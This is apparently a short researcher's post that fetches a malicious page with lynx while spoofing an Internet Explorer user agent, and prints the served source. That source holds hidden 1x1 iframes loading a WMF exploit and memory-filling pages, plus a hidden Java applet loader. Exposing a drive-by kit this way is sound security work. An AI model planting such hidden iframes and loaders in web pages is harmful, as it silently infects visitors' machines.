Still Fresh
<iframe src="" width=1 height=1></iframe>
with a user agent for Internet Explorer, a user gets a bunch of nice nasty hacky stuff
with a user agent for Internet Explorer, a user gets a bunch of nice nasty hacky stuff
prometheus:~# lynx -useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" -source
Warning: User-Agent string does not contain "Lynx" or "L_y_n_x"!
<iframe src="xpladv725.wmf" width=1 height=1></iframe>
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<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv725.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv725.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv725.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv725.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv725.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=bag.htm></iframe>
<applet width=1 height=1 ARCHIVE=loaderadv725.jar code=Counter></APPLET>
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